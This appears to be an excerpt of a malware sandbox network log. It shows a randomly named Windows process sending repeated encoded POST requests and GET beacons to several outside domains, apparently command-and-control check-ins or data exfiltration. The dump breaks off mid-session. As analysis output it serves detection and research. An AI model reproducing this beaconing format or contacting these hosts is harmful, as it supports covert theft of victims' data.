Jul 3, 2024 08:36:25.942497015 CEST	1236	IN	Data Raw: 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 77 61 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 Data Ascii: container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding
Jul 3, 2024 08:36:25.947407007 CEST	1236	IN	Data Raw: 2d 77 6f 72 64 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 66 6f 6e 74 2d 73 Data Ascii: -word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-block__list-elemen

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	61462	47.239.13.172	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:39.734472036 CEST	746	OUT	POST /2dv8/ HTTP/1.1 Host: www.qe1jqiste.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 206 Content-Type: application/x-www-form-urlencoded Origin: http://www.qe1jqiste.sbs Referer: http://www.qe1jqiste.sbs/2dv8/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 6b 75 75 41 64 6e 49 68 37 33 4b 59 4f 6e 45 78 6d 56 47 52 39 31 31 59 50 48 67 42 6b 39 64 55 32 6e 59 65 69 54 62 45 2b 75 31 70 41 42 45 63 6b 4f 64 31 6c 6b 6a 33 62 30 72 74 47 68 67 33 48 2f 6f 4e 61 2f 6f 74 50 4e 79 30 6d 71 6f 4e 74 31 6d 4c 35 71 41 67 50 44 78 67 44 74 6c 50 6c 50 4a 50 70 43 2b 65 49 35 63 2b 78 2f 6e 6c 77 38 68 36 44 33 48 39 69 71 70 38 31 39 54 37 53 73 34 66 7a 41 30 72 52 2f 68 6e 6a 6a 53 76 67 55 66 58 4c 67 46 39 46 43 48 30 61 68 38 2f 41 66 46 4f 45 47 36 48 6f 38 76 74 74 65 4f 6f 61 58 79 38 54 7a 56 64 78 70 4e 69 6d 62 62 37 6f 6d 47 53 46 65 6f 3d Data Ascii: iJiX_=kuuAdnIh73KYOnExmVGR911YPHgBk9dU2nYeiTbE+u1pABEckOd1lkj3b0rtGhg3H/oNa/otPNy0mqoNt1mL5qAgPDxgDtlPlPJPpC+eI5c+x/nlw8h6D3H9iqp819T7Ss4fzA0rR/hnjjSvgUfXLgF9FCH0ah8/AfFOEG6Ho8vtteOoaXy8TzVdxpNimbb7omGSFeo=
Jul 3, 2024 08:36:40.632538080 CEST	165	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Wed, 03 Jul 2024 06:36:40 GMT Content-Type: text/html Content-Length: 2 Connection: close ETag: "660279db-2" Data Raw: 31 0a Data Ascii: 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	61463	47.239.13.172	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:42.274563074 CEST	766	OUT	POST /2dv8/ HTTP/1.1 Host: www.qe1jqiste.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 226 Content-Type: application/x-www-form-urlencoded Origin: http://www.qe1jqiste.sbs Referer: http://www.qe1jqiste.sbs/2dv8/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 6b 75 75 41 64 6e 49 68 37 33 4b 59 63 7a 34 78 6b 32 75 52 71 46 31 62 45 6e 67 42 74 64 64 51 32 6e 55 65 69 53 66 55 2b 62 6c 70 42 6a 4d 63 32 2f 64 31 6d 6b 6a 33 55 55 71 6c 4c 42 68 35 48 2f 30 2f 61 36 51 74 50 4e 32 30 6d 75 6b 4e 74 43 4b 4d 34 36 41 69 45 6a 78 69 63 39 6c 50 6c 50 4a 50 70 43 71 6b 49 35 45 2b 78 50 33 6c 78 5a 64 35 41 33 48 2b 6c 71 70 38 78 39 54 2f 53 73 35 4b 7a 46 52 47 52 36 6c 6e 6a 6e 61 76 6a 42 2f 55 42 67 46 2f 42 43 47 71 54 77 46 70 43 2b 41 75 50 51 2b 4c 67 75 54 50 6c 49 6a 43 41 31 36 36 51 7a 39 32 78 71 6c 55 6a 73 47 54 79 46 57 69 62 4a 39 43 77 33 62 46 30 51 54 79 57 43 55 39 78 47 46 4d 33 51 48 76 Data Ascii: iJiX_=kuuAdnIh73KYcz4xk2uRqF1bEngBtddQ2nUeiSfU+blpBjMc2/d1mkj3UUqlLBh5H/0/a6QtPN20mukNtCKM46AiEjxic9lPlPJPpCqkI5E+xP3lxZd5A3H+lqp8x9T/Ss5KzFRGR6lnjnavjB/UBgF/BCGqTwFpC+AuPQ+LguTPlIjCA166Qz92xqlUjsGTyFWibJ9Cw3bF0QTyWCU9xGFM3QHv
Jul 3, 2024 08:36:43.216133118 CEST	165	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Wed, 03 Jul 2024 06:36:43 GMT Content-Type: text/html Content-Length: 2 Connection: close ETag: "660279db-2" Data Raw: 31 0a Data Ascii: 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	61464	47.239.13.172	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:44.808738947 CEST	1783	OUT	POST /2dv8/ HTTP/1.1 Host: www.qe1jqiste.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 1242 Content-Type: application/x-www-form-urlencoded Origin: http://www.qe1jqiste.sbs Referer: http://www.qe1jqiste.sbs/2dv8/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 6b 75 75 41 64 6e 49 68 37 33 4b 59 63 7a 34 78 6b 32 75 52 71 46 31 62 45 6e 67 42 74 64 64 51 32 6e 55 65 69 53 66 55 2b 62 74 70 41 57 41 63 6e 73 31 31 6e 6b 6a 33 5a 30 71 6b 4c 42 68 30 48 2f 39 32 61 36 56 51 50 50 2b 30 6b 4c 34 4e 6b 54 4b 4d 79 36 41 69 4c 44 78 6a 44 74 6b 58 6c 50 5a 44 70 43 36 6b 49 35 45 2b 78 4a 62 6c 30 38 68 35 4e 58 48 39 69 71 70 77 31 39 54 62 53 73 78 61 7a 45 52 77 52 4f 52 6e 69 48 4b 76 68 31 66 55 43 41 46 68 47 43 47 69 54 78 34 33 43 2b 4e 66 50 51 6a 6b 67 74 44 50 32 73 44 55 61 47 4b 56 48 46 68 6c 78 59 78 50 37 62 2b 79 74 30 43 30 48 71 31 52 34 43 37 39 6a 41 50 45 61 44 4d 6f 6c 51 38 65 36 6e 2b 42 51 4a 2f 4d 6a 51 68 44 4f 6b 4f 47 68 61 70 46 42 35 5a 69 64 71 35 6a 34 45 62 58 4a 58 78 77 45 68 65 36 45 41 6c 50 66 39 68 4e 74 2f 31 65 39 4c 77 4e 53 75 70 55 44 7a 73 6f 62 4b 73 4b 6b 37 58 61 74 79 4d 75 6b 4e 70 65 57 41 4e 51 33 6e 41 53 31 44 35 6f 69 67 58 6d 33 6d 74 65 6a 4b 57 4b 69 31 4f 35 71 36 65 42 35 31 6d 6d [TRUNCATED] Data Ascii: iJiX_=kuuAdnIh73KYcz4xk2uRqF1bEngBtddQ2nUeiSfU+btpAWAcns11nkj3Z0qkLBh0H/92a6VQPP+0kL4NkTKMy6AiLDxjDtkXlPZDpC6kI5E+xJbl08h5NXH9iqpw19TbSsxazERwRORniHKvh1fUCAFhGCGiTx43C+NfPQjkgtDP2sDUaGKVHFhlxYxP7b+yt0C0Hq1R4C79jAPEaDMolQ8e6n+BQJ/MjQhDOkOGhapFB5Zidq5j4EbXJXxwEhe6EAlPf9hNt/1e9LwNSupUDzsobKsKk7XatyMukNpeWANQ3nAS1D5oigXm3mtejKWKi1O5q6eB51mmbDxOjHyPRi8HQom61tUHuGHuZJhuT9s4/jTcJUm+s6IGf31YwHzdApBfRv6/gsUHfUF2JgqcgkFxv3x9ylndbChc9ae4PovETe/HGn9Grs4kRxrLTD2tbJfg+QzicgL04qSz2K3zOU50qd8gKMzGzoBDOdoGbgWsHLHK3uY2w9Jtnnd3BUCCVcoeKWRyCTIMLkTzlFCuatUM032Em8EmBbWNFBNgORLsixeZ4qDoQmeJeiv8Z9S9WKzrK89d0H5PNFwqE6vRMA+vLfze9Tq7nifzJiJCV/S+QG5LT/4dYghJZMiqeh/yYE4ikRC2GkZ0XFEfOmUPrKftXAcwHdSCy/Td8IslOEEczXXLstKdHnvVzPPxCMR4JZ+OvxkotomithlI2CnVwe04PMlrH6M06S1bGeX73LO/8Gwl+JIp/HlBTVN87DjCfocWv9dhB9aGce8puL47+f/Ri7EyWNXUYW0gqQUjAMTb79sFabwGglYFf11yG+zxfmO8Q6GKlfaFX3NJ2Z44AY8X8VTAGwIWs85qZsdXsyWdLVGZguHzQkSbKFLru58kfvt1rriW4idFFVo9mwNxJLj6CXMAbhEs9/l1/4n8yc2q6NED9tBb+pWvCXUM7CyIxmkrEpvtRDmH+JiiqB5gukfkrXeA3B4MTqWAGHlQM/VK7H [TRUNCATED]
Jul 3, 2024 08:36:45.731050968 CEST	165	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Wed, 03 Jul 2024 06:36:45 GMT Content-Type: text/html Content-Length: 2 Connection: close ETag: "660279db-2" Data Raw: 31 0a Data Ascii: 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.8	61465	47.239.13.172	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:47.337863922 CEST	480	OUT	GET /2dv8/?iJiX_=psGgeTZm92uMMjwvw3+ekktQKHQr8PtkyzA1wjnO7+NPXjQAxvdC6xrXVCGmGkxqQ5F0SN4BIMC+q/QNsQX29b0eHgxHefEnuc0ogV2nM4gi2K3554lDMjGRktsI1JKBOA==&eZ=3HYLM HTTP/1.1 Host: www.qe1jqiste.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 3, 2024 08:36:48.244587898 CEST	224	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 03 Jul 2024 06:36:48 GMT Content-Type: text/html Content-Length: 2 Last-Modified: Tue, 26 Mar 2024 07:31:39 GMT Connection: close ETag: "660279db-2" Accept-Ranges: bytes Data Raw: 31 0a Data Ascii: 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.8	61466	208.91.197.27	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:53.486012936 CEST	770	OUT	POST /n12h/ HTTP/1.1 Host: www.thesprinklesontop.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 206 Content-Type: application/x-www-form-urlencoded Origin: http://www.thesprinklesontop.com Referer: http://www.thesprinklesontop.com/n12h/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 63 4a 54 76 4e 31 57 74 65 47 6f 4b 56 45 45 39 64 35 5a 30 74 5a 35 43 49 71 74 4b 59 52 42 35 4f 69 34 78 44 70 2f 66 31 30 45 79 5a 38 4f 57 75 50 61 56 48 6a 55 6f 6c 79 75 61 58 74 4d 46 6e 79 71 61 72 61 4b 4d 6d 55 6f 65 4b 59 73 65 32 64 63 46 6f 7a 49 39 39 69 2f 4c 34 65 52 33 7a 51 53 7a 37 38 36 57 62 59 51 55 55 6c 58 37 75 33 2b 33 68 69 68 38 49 51 6e 35 66 48 4d 43 59 68 70 30 67 78 5a 68 57 70 66 73 6f 65 68 4d 6b 42 57 2b 46 2f 48 48 50 6b 61 44 38 44 56 70 74 43 55 56 6d 35 76 58 4f 49 56 7a 71 69 76 59 42 62 4d 67 37 32 65 2b 47 59 69 74 73 54 7a 68 58 53 62 62 41 4f 59 3d Data Ascii: iJiX_=cJTvN1WteGoKVEE9d5Z0tZ5CIqtKYRB5Oi4xDp/f10EyZ8OWuPaVHjUolyuaXtMFnyqaraKMmUoeKYse2dcFozI99i/L4eR3zQSz786WbYQUUlX7u3+3hih8IQn5fHMCYhp0gxZhWpfsoehMkBW+F/HHPkaD8DVptCUVm5vXOIVzqivYBbMg72e+GYitsTzhXSbbAOY=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.8	61467	208.91.197.27	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:56.027282953 CEST	790	OUT	POST /n12h/ HTTP/1.1 Host: www.thesprinklesontop.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 226 Content-Type: application/x-www-form-urlencoded Origin: http://www.thesprinklesontop.com Referer: http://www.thesprinklesontop.com/n12h/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 63 4a 54 76 4e 31 57 74 65 47 6f 4b 55 6b 55 39 52 36 68 30 36 70 35 4e 44 4b 74 4b 57 78 42 69 4f 69 30 78 44 6f 37 31 31 43 30 79 5a 59 4b 57 76 4f 61 56 43 6a 55 6f 69 43 75 56 4a 64 4d 30 6e 79 33 36 72 62 61 4d 6d 55 4d 65 4b 59 63 65 6a 2b 30 47 71 6a 49 37 78 43 2f 4e 6c 4f 52 33 7a 51 53 7a 37 38 75 38 62 59 34 55 55 56 6e 37 38 6a 69 32 67 69 68 37 50 51 6e 35 62 48 4d 47 59 68 70 61 67 30 34 4b 57 72 58 73 6f 61 70 4d 6b 54 2b 39 4b 2f 47 43 43 45 62 55 38 6d 77 39 30 6a 64 33 72 71 33 71 45 4a 4e 30 72 55 43 79 62 35 45 6d 34 32 32 56 47 62 4b 62 70 6b 75 4a 4e 78 4c 72 65 5a 4f 39 4a 52 61 68 38 72 49 51 4d 73 75 66 71 43 59 46 72 71 43 71 Data Ascii: iJiX_=cJTvN1WteGoKUkU9R6h06p5NDKtKWxBiOi0xDo711C0yZYKWvOaVCjUoiCuVJdM0ny36rbaMmUMeKYcej+0GqjI7xC/NlOR3zQSz78u8bY4UUVn78ji2gih7PQn5bHMGYhpag04KWrXsoapMkT+9K/GCCEbU8mw90jd3rq3qEJN0rUCyb5Em422VGbKbpkuJNxLreZO9JRah8rIQMsufqCYFrqCq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.8	61468	208.91.197.27	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:58.558705091 CEST	1807	OUT	POST /n12h/ HTTP/1.1 Host: www.thesprinklesontop.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 1242 Content-Type: application/x-www-form-urlencoded Origin: http://www.thesprinklesontop.com Referer: http://www.thesprinklesontop.com/n12h/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 63 4a 54 76 4e 31 57 74 65 47 6f 4b 55 6b 55 39 52 36 68 30 36 70 35 4e 44 4b 74 4b 57 78 42 69 4f 69 30 78 44 6f 37 31 31 42 55 79 61 74 65 57 75 74 79 56 46 6a 55 6f 74 53 75 46 4a 64 4d 70 6e 79 76 6c 72 65 43 63 6d 57 6b 65 49 37 55 65 79 76 30 47 6a 6a 49 37 35 69 2f 4d 34 65 51 6a 7a 51 43 33 37 38 2b 38 62 59 34 55 55 54 72 37 73 48 2b 32 69 69 68 38 49 51 6e 39 66 48 4e 5a 59 69 5a 73 67 30 31 78 56 59 50 73 70 37 56 4d 6e 6e 65 39 44 2f 47 41 46 45 62 63 38 6d 30 4c 30 6a 51 47 72 70 72 45 45 4f 68 30 72 51 48 37 45 39 64 77 68 77 36 34 47 73 53 47 76 30 4b 7a 53 7a 62 47 43 2b 6e 62 50 32 4f 76 71 34 45 65 44 75 32 51 78 6d 67 77 71 4d 69 6b 38 54 4f 50 54 6b 41 4f 65 39 36 2b 49 7a 4d 6c 61 55 56 2f 4e 6b 4a 71 4b 53 31 6b 42 66 76 53 6b 66 61 4e 62 32 51 49 5a 57 63 4e 59 54 50 74 46 59 72 70 38 39 65 6e 2b 65 49 77 65 42 59 78 51 76 69 6f 49 4e 68 41 73 44 73 31 37 4c 69 64 4b 54 70 38 6a 59 42 68 56 49 37 51 78 2f 6e 57 33 43 48 57 6d 59 41 32 6c 7a 54 4c 31 57 2b 53 [TRUNCATED] Data Ascii: iJiX_=cJTvN1WteGoKUkU9R6h06p5NDKtKWxBiOi0xDo711BUyateWutyVFjUotSuFJdMpnyvlreCcmWkeI7Ueyv0GjjI75i/M4eQjzQC378+8bY4UUTr7sH+2iih8IQn9fHNZYiZsg01xVYPsp7VMnne9D/GAFEbc8m0L0jQGrprEEOh0rQH7E9dwhw64GsSGv0KzSzbGC+nbP2Ovq4EeDu2QxmgwqMik8TOPTkAOe96+IzMlaUV/NkJqKS1kBfvSkfaNb2QIZWcNYTPtFYrp89en+eIweBYxQvioINhAsDs17LidKTp8jYBhVI7Qx/nW3CHWmYA2lzTL1W+S37+As+hzhIbsngOABh+ch/n81aphZWT/rYr0xsV1cB3hxLABZDn0BvQI365Q/AVQKs7TvYsURL3DRtESjdysr0qCCB+XDtSMh9JTrVqJZG4oEVJ6LJJT83oGKaQ6W8jKQZeAk2HAKOLB7kG7GnIKE7MwMsc7xB9SDfD0QGLyvVMnIQALtoSAk5wzTyvYQS5zY2U6SSFMqwn2xLvOe11QSm3aBD7dzm+lVi9UQ9pVjW54dtRDWPNf/kar3936Y1v8NS9pMKAKsIJZIxkXh08faWd8Tfn97onkqNb6usgqGwJOPyLw1tW++vUBPXZfZM0RjOlzbpX2nSa/Pg/OQ0n9TcSew9M79PQuvnPJ2LoR3kdQKyuREXsxaHHMkxiuFit7WV8pk3tbJ/frSVCbAyWjnInFHM8Y/CVpM/WK6eqiACE8FN3/YeemhqDuqAhEoqaIxvvl0v9A2Yit3LslE3gEnpNr1cWCmIxrQq4j2MVB5V85IXEG3uZ24mZLIUPbkxo8I/OBNpkuLWIQdZG3y6TuWOZtKotAe8FpoqdK+g+vE8wHiXtL6t+nYIgvDr7GRlEZnRWqUL9QSPXZhFLR3A6c1GMv3hTJwE6pyUFAhY5bnYAZABFSjxKoZooCZsriJ0spZkMo0JwxEtElQGRREVJMbf/OffKl7xiM0B [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.8	61469	208.91.197.27	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:37:01.089768887 CEST	488	OUT	GET /n12h/?eZ=3HYLM&iJiX_=RL7POCi4RQwOAHw5RpRi0oRkNrFJHCE4O3Q4e5XJ1RgvJteO2OLpaAwWvE/Xee8N43HhgIeZk31xLdwZ5MBNiQ0n2zDakMpJnzyHioqcCYotdW6+iH3FtmEZOQT5Ykxdbw== HTTP/1.1 Host: www.thesprinklesontop.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 3, 2024 08:37:05.391622066 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 06:36:55 GMT Server: Apache Set-Cookie: vsid=921vr467534215361107180; expires=Mon, 02-Jul-2029 06:36:55 GMT; Max-Age=157680000; path=/; domain=www.thesprinklesontop.com; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_RWfQlBFoZ/G1wgWt4OrJ/V8pkor7I5HaasfnCNUQSbsm82TeBeZoWq9YfCm//uDqqEWoL0pITXL/t6TtfoWlPw== Content-Length: 2645 Content-Type: text/html; charset=UTF-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 52 57 66 51 6c 42 46 6f 5a 2f 47 31 77 67 57 74 34 4f 72 4a 2f 56 38 70 6b 6f 72 37 49 35 48 61 61 73 66 6e 43 4e 55 51 53 62 73 6d 38 32 54 65 42 65 5a 6f 57 71 39 59 66 43 6d 2f 2f 75 44 71 71 45 57 6f 4c 30 70 49 54 58 4c 2f 74 36 54 74 66 6f 57 6c 50 77 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_RWfQlBFoZ/G1wgWt4OrJ/V8pkor7I5HaasfnCNUQSbsm82TeBeZoWq9YfCm//uDqqEWoL0pITXL/t6TtfoWlPw=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.thesprinklesontop.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.thesprinklesontop.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.thesp
Jul 3, 2024 08:37:05.391647100 CEST	187	IN	Data Raw: 72 69 6e 6b 6c 65 73 6f 6e 74 6f 70 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 61 31 68 56 59 33 42 46 53 56 45 78 65 6e 4e 53 54 6d 56 48 59 6d 70 52 4e 55 64 47 4e 58 56 5a 4e 6e 6c 49 62 47 64 7a 5a 54 51 Data Ascii: rinklesontop.com/sk-logabpstatus.php?a=a1hVY3BFSVExenNSTmVHYmpRNUdGNXVZNnlIbGdzZTQ2NGFrV3QvZm1JMklaZVpRNlBML0JuejZ2WnBibVhydnAzb0NGRFpTN3U0b0xoMGZYMXNXMVFDUkVrOGJaLzQ0MDFac2EzbkthZ0Q3RitO
Jul 3, 2024 08:37:05.391660929 CEST	1236	IN	Data Raw: 64 48 45 79 52 7a 64 73 55 54 68 49 65 6e 4a 7a 4d 33 51 33 4e 46 41 3d 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b 69 66 28 74 79 70 65 6f 66 20 61 62 70 65 72 Data Ascii: dHEyRzdsUThIenJzM3Q3NFA=&b="+abp;document.body.appendChild(imglog);if(typeof abperurl !== "undefined" && abperurl!="")window.top.location=abperurl;}catch(err){}}</script> <meta charset="utf-8"> <style type="text/css"> html,
Jul 3, 2024 08:37:05.391721010 CEST	525	IN	Data Raw: 5f 6c 6f 67 6f 3d 6e 65 74 73 6f 6c 2d 6c 6f 67 6f 2e 70 6e 67 26 61 6d 70 3b 72 65 67 5f 68 72 65 66 5f 74 65 78 74 3d 54 68 69 73 2b 50 61 67 65 2b 49 73 2b 55 6e 64 65 72 2b 43 6f 6e 73 74 72 75 63 74 69 6f 6e 2b 2d 2b 43 6f 6d 69 6e 67 2b 53 Data Ascii: _logo=netsol-logo.png&reg_href_text=This+Page+Is+Under+Construction+-+Coming+Soon%21&reg_href_url=&reg_href_text_2=Why+am+I+seeing+this+%27Under+Construction%27+page%3F&reg_href_url_2=http%3A%2F%2Fwww.thesprinklesontop.com%2F__

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.8	61470	66.235.200.146	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:37:10.466625929 CEST	752	OUT	POST /0rsk/ HTTP/1.1 Host: www.stefanogaus.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 206 Content-Type: application/x-www-form-urlencoded Origin: http://www.stefanogaus.com Referer: http://www.stefanogaus.com/0rsk/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 59 71 72 65 39 36 52 71 32 47 72 57 44 53 73 30 53 5a 64 73 47 54 54 71 64 4f 55 43 47 56 4d 65 55 68 57 71 64 63 4c 62 33 6f 34 76 38 58 74 6b 4a 53 70 7a 4e 4d 4f 6d 32 56 71 38 41 35 76 71 4a 47 66 41 64 63 52 57 59 6b 67 4c 71 47 78 4d 4b 48 59 41 36 48 36 44 4a 2b 39 68 71 74 6c 68 6e 66 53 63 6d 6b 7a 66 4f 64 5a 78 78 59 64 61 6b 33 55 54 59 31 53 36 6e 41 43 4e 70 41 71 39 4c 36 38 72 4a 52 56 33 